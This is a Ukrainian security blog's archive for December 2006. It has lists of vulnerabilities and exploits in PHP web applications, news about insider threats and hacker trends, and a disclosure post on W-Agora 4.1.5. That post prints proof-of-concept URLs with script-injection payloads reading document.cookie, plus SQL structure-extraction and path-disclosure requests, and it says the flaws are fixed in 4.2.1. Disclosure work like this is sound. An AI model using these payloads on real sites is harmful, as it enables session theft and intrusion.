Архів за Грудень, 2006

Добірка уразливостей

14:01 23.12.2006

В даній добірці уразливості в веб додатках:

  • TorrentFlux ?action? Script Insertion (деталі)
  • osprey 1.0 (ListRecords.php) Remote File Include Vulnerability (деталі)
  • PHP Forge 3b2 (/inc/inc.php) Remote File Include Vulnerability (деталі)
  • patchlodel-0.7.3 - Remote File Include Vulnerabilities (деталі)
  • Full Path Disclosure in PHP-Wyana (деталі)
  • Mambo V4.6.x vulnerabilities (деталі)
  • PHP Poll Creator 1.04 (poll_vote.php)File Include (деталі)
  • Advisory for Oneorzero helpdesk (деталі)
  • SQL injection vulnerability in war.php in Virtual War (Vwar) 1.5.0 (деталі)
  • SQL-ін’єкція в Techno Dreams Guestbook (деталі)

Інсайдери все небезпечніше і небезпечніше

19:52 22.12.2006

Як говориться в статті на секлабі “2006 E-Crime Watch Survey інсайдери все небезпечніше і небезпечніше”, в наш час все більшої гостроти набирає проблема інсайдерів. В 2006 році кількість інцедентів з інсайдерами збільшилася (і причинення збитків в результаті цих інцидентів). Тому потрібно все більше звертати увагу на цю проблему.

Наведені результати опитування, зокрема:

  • яка частка всіх інцидентів ІТ-безпеки відбулася з вини інсайдерів,
  • які комп’ютерні злочини були зроблені проти вашої компанії в попередні 12 місяців,
  • якими способами інсайдери робили комп’ютерні злочини,
  • які з перерахованих типів утрат понесла ваша організація в попередні 12 місяців у результаті електронних порушень,
  • яке з наслідків інсайдерських інцидентів нанесло найбільшу шкоду організації,
  • яка динаміка грошових втрат вашої компанії від електронних злочинів за попередні 12 місяців у порівнянні з аналогічним періодом минулого року,
  • яка з наступних груп зловмисників нанесла найбільшу шкоду за минулі 12 місяців,
  • чи має ваша організація конкретний план процедур, чи проводить політику безпеки для виявлення і відповіді на атаки, проведені проти вашої компанії,
  • як довго у вашій компанії зберігаються логи, по яких можна відстежити інциденти,
  • 10 найбільш ефективних застосовуваних технологій для визначення і/або відбиття атак, порушення безпеки,
  • які з нижче перерахованих політик безпеки і процедур використовувалися у вашій організації для запобігання чи зменшення погрози безпеки,
  • як часто у вашій організації переглядаються й обновляються політики безпеки,
  • чи стала ваша організація більш стурбована загрозами електронної безпеки, чим торік,
  • у якому ступені, більш чи менш готова ваша організація до припинення електронних атак, ніж торік.

В результаті проведених досліджень інцедентів на підприємствах, яки привели до негативних наслідків, стало видно, що кількість інцедентів з інсайдерами сильно зросла (в порівнянні з минулими роками), що нерідко інсайдери навіть наносять більше шкоди ніж хакери. Тобто потрібно більше звертати увагу на безпеку всередині, окрім безпеки ззовні. Щоб виявляти і протидіяти внутрішнім атакам, мінімізуючи втрати від діяльності інсайдерів.

  • 2006 E-Crime Watch Survey инсайдеры все опаснее и опаснее (деталі)

Уразливість на safe.cnews.ru

18:40 22.12.2006

05.11.2006

У вересні, 15.09.2006, я знайшов Cross-Site Scripting уразливість на популярному проекті http://safe.cnews.ru (присвяченому інформаціній безпеці). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

Проект cnews.ru частий гість в моїх новинах - я вже неодноразово писав про уразливості на їх сайтах (Уразливості на zoom.cnews.ru, Нові уразливості на www.cnews.ru та Уразливість на www.cnews.ru).

22.12.2006

XSS:

Уразливість вже виправлена.

Добірка експлоітів

16:01 22.12.2006

В даній добірці експлоіти в веб додатках:

  • phpBB RPG Events 1.0 functions_rpg_events Remote File Include Exploit (деталі)
  • CampSite <= 2.6.1 (g_documentRoot) Remote File Include Vulnerability (деталі)
  • phpBBFM <= 206-3-3 (phpbb_root_path) Remote File Include Exploit (деталі)
  • CyberBrau <= 0.9.4 (forum/track.php) Remote File Include Vulnerability (деталі)
  • Buzlas <= v2006-1 Full Remote File Include Vulnerability (деталі)

Добірка експлоітів

21:42 21.12.2006

В даній добірці експлоіти в веб додатках:

  • phpBB SearchIndexer Mod (archive_topic.php) Remote File Include Exploit (деталі)
  • phpBurningPortal <= 1.0.1 (lang_path) Remote File Include Exploit (деталі)
  • AROUNDMe <= 0.5.2 (templatePath) Remote File Include Vulnerability (деталі)
  • NuralStorm Webmail <= 0.98b (process.php) Remote Include Vulnerability (деталі)
  • SpamOborona PHPBB Plugin Remote File Include Vulnerability (деталі)

Експлуатація уразливостей - пріоритет для кібер-злочинців

20:40 21.12.2006

Протягом останніх декількох місяців спостерігається значне збільшення числа програм, що використовують діри в безпеці найбільш популярних програм, що дозволяє здійснювати віддалені атаки з боку кібер-злочинців. Дана ситуація відповідає новій динаміці розвитку шкідливого ПЗ, у якій головною метою стала фінансова нажива. Інтернет-злочинці концентрують свої зусилля на виявленні й експлуатації недоліків безпеки, що дозволяє їм збирати якнайбільше конфіденційних даних користувачів.

Зокрема, злочинці постійно знаходяться в пошуку уразлиовстей у додатках, установлених на мільйонах комп’ютерів. Наприклад, на минулому тижні Microsoft випустила заплатки для виправлення дір в безпеці Internet Explorer і Microsoft Office. Прикладом нової динаміки розвитку, що заслуговує уваги, шкідливого ПЗ є уразливість MS06-040, імовірно, одна з найбільш серйозних за останній час. До того як з’явився хробак Oscarbot.KD, що експлуатує її, пройшло лише кілька годин. Даний хробак не ставив перед собою ціль поширитися на мільйони комп’ютерів протягом кілька хвилин, замість цього він дозволяв зловмиснику виконувати ряд дій на заражених комп’ютерах.

Цільові атаки - лише одна з проблем у поточній панорамі Інтернет-загроз. Оскільки в цих атаках часто використовуються спеціально створені унікальні шкідливі коди, що відсилаються обмеженій кількості потенційних жертв, користувачі в основній масі не інформовані про їхнє існування, а оскільки вони маскують свою присутність, антивірусні компанії також не усвідомлюють їхнього існування, і тому не можуть створити для них відповідні вакцини.

В даний час життєво важливим компонентом безпеки комп’ютерів є попереджуючі технології, здатні виявляти загрози, не потребуючи оновлень. Також винятково важливим є відвідування час від часу сайтів розробників програмного забезпечення, щоб переконатися в наявності відновлень для додатків, установлених на вашому комп’ютері.

По матеріалам http://sb.adverman.com.

До речі, про уразливості на sb.adverman.com я вже писав.

Добірка уразливостей

15:01 21.12.2006

В даній добірці уразливості в веб додатках:

  • Boonex Dolphin 5.2 Remote File Inclusion (деталі)
  • Comdev One Admin 4.1 Remote File Inclusion (деталі)
  • phpAdsNew include bug! (деталі)
  • Phpmybibli <=2.1 Multiple Remote File Inclusion Vulnerability (деталі)
  • TorrentFlux ?user_id? Script Insertion (деталі)
  • TorrentFlux ?file? Script Insertion (деталі)
  • [Xss] IN phplist v 2.10.2 (деталі)
  • PHP Forge 3b2 (/inc/inc.php) Remote File Include Vulnerability (деталі)
  • PHP remote file inclusion vulnerability in Kayako eSupport 2.3.1 (деталі)
  • Міжсайтовий скриптінг в vBulletin (деталі)

У новому році головною метою хакерів стануть блоги, мобільні телефони та ІCQ

18:28 20.12.2006

У 2007 році основна увага хакерів буде приділена блогам і соціальним мережам на зразок MySpace. До такого висновку прийшли фахівці компанії Trend Micro, що спеціалізується в області інтернет-безпеки.

Експерти Trend Micro вважають, що крім блогів хакери будуть активно атакувати служби миттєвих повідомлень (ICQ чи MSN), а також мобільні телефони. Причому метою для хакерів буде банальний заробіток грошей за рахунок крадіжки особистих зведень користувачів.

Фахівці McAfee, у свою чергу, застерігають співробітників великих компаній про нові види промислового шантажу. Боятися працівникам корпорацій варто “найнятих злочинцями студентів”.

По матеріалам http://lenta.ru.

XSS, SQL DB Structure Extraction та FPD в W-Agora

17:31 20.12.2006

28.11.2006

Нещодавно, 22.11.2006, мною були знайдені Cross-Site Scripting, SQL DB Structure Extraction та Full path disclosure уразливості в W-Agora. І знайшов їх коли натрапив на уразливості на maidan.org.ua.

W-Agora - це система веб публікації (web publishing and forum software), тобто по суті CMS. Уразлива версії системи W-Agora 4.1.5 та попередні версії.

Всього я знайшов 7 XSS, одну SQL DB Structure Extraction та одну Full path disclosure уразливість. Найближчим часом повідомлю розробникам W-Agora.

20.12.2006

Уразливості в скрипті search.php3.

XSS:

http://site/news/search.php3?site=x&bn=y_news&gosearch=1&sf=1&pattern=%3Cscript%3Ealert(document.cookie)%3C/script%3E

SQL DB Structure Extraction:

http://site/news/search.php3?site=x&bn=y_news&gosearch=1&sf=1&pattern=xxxxxxxxxx

Уразливості в скрипті list.php.

XSS:

http://site/static/list.php?key=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure:

http://site/static/list.php?key=-1102352364

Уразливості в скрипті login.php3.

XSS:

http://site/news/login.php3?site=x&bn=y_news&loginform=1&loginuser=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/news/login.php3?site=x&bn=y_news&loginform=1&loginpassword=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/news/login.php3?site=x&bn=y_news&loginform=1&redirect_url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/news/login.php3?site=x&bn=y_news&loginform=1&editsite=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/news/login.php3?site=x&bn=y_news&loginform=1&userid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Як було зазначено, уразливості відносяться до W-Agora 4.1.5 та попередніх версій. І як повідомив мені розробник системи W-Agora, всі вищезгадані уразливості вже виправлені в самій останній версії - 4.2.1. Котра вже вийшла і всі користувачі системи можуть оновити її движок до останньої версії.

Добірка експлоітів

15:42 20.12.2006

В даній добірці експлоіти в веб додатках:

  • phpBB ACP User Registration Mod 1.0 File Inclusion Vulnerability (деталі)
  • DigitalHive <= 2.0 RC2 (base_include.php) Remote Include Vulnerability (деталі)
  • phpBB Prillian French Mod <= 0.8.0 Remote File Include Exploit (деталі)
  • Xcode OpenBase <= 9.1.5 Local Root Exploit (OSX) (деталі)
  • Redaction System 1.0000 - Remote Include Exploit (деталі)